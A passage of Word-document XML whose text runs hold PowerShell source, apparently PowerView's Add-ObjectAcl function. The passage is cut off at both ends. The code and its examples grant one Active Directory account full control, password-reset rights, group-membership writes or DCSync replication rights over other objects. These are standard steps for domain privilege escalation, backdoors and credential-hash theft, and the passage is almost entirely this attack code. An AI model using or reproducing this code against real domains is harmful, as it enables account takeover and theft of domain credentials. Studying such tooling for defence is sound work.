    </w:p>
    <w:p w14:paraId="72E04B1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21AE5C3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915A618" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E91ABF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to use for the target query, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E8331" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="617B9038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C588EA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C64B1F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C5E1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B839BBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA5849" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2919ABF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E69BC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21F265CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B383AC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6733747A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C084F27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25D1550D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Grants 'john' all full access rights to the 'matt' account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB88AF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44B73ABC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44550973" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D5861BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john -Rights ResetPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA44CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="291DA48B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Grants 'john' the right to reset the password for the 'matt' account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E33F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A5BC7BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AB58B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BE3502A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://adsecurity.org/?p=1906</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A873DB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01576309" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F03AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BCA830" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="278D2274" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6F7250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A814D6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83BA25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetSamAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6188E0BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B221DC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC5B51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetName = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA802FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E86EE69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('DN')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797517D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FBFCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetDistinguishedName = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D5C76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60A0D78F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A67BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EA6886" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22B88C43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE9A6EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $TargetADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5C1F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39DF01D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B56582B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetADSprefix,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8132E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="498A941F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646138C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidatePattern('^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB5FF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PrincipalSID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D5961" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07CA9F22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03477F82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PrincipalName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F35722" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A629EB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146EAB3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PrincipalSamAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AC332D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D343465" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CAC1A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("All","ResetPassword","WriteMembers","DCSync")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B74485C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Rights = "All",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4708D4B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38D4CAB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671B9B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RightsGUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE0575" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D5435E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A4443E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DAE540" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3299A337" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B173C16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569004B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="383D1117" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C58303" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FD3E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B0CECF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FAB425" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71DD93DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E1D09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $TargetADSpath -ADSprefix $TargetADSprefix -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2CD26F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B91E94D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($PrincipalSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B02E46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ResolvedPrincipalSID = $PrincipalSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC24A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A46B964" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642F6EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Principal = Get-ADObject -Domain $Domain -DomainController $DomainController -Name $PrincipalName -SamAccountName $PrincipalSamAccountName -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02082537" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D886229" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(!$Principal) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A74B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "Error resolving principal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCBAB2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F72C75F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ResolvedPrincipalSID = $Principal.objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157622D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E29F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ResolvedPrincipalSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BFB56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            throw "Error resolving principal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65E497" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF4E9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77F477" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46EA56BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270E84E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="730C54A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Searcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1844E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D17978D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if($TargetSamAccountName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DC2F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Searcher.filter="(&amp;(samaccountname=$TargetSamAccountName)(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCF676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717F564" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2DE626" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Searcher.filter="(&amp;(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3446D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4F6EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08416FBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51685B88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $Searcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C6140" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B9CDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="783D57C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D1514" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61FE8B7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TargetDN = $_.Properties.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A1179" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37BD51B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ResolvedPrincipalSID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F4653E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDCE938" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ControlType = [System.Security.AccessControl.AccessControlType] "Allow"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBE02F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ACEs = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030458EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58D41426" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($RightsGUID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B15DB69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GUIDs = @($RightsGUID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F214F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFDCF8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D105E2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $GUIDs = Switch ($Rights) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F95A76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # ResetPassword doesn't need to know the user's current password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0410153F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BC416" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # allows for the modification of group membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E74A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E23D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2</w:t>
      </w:r>
    </w:p>
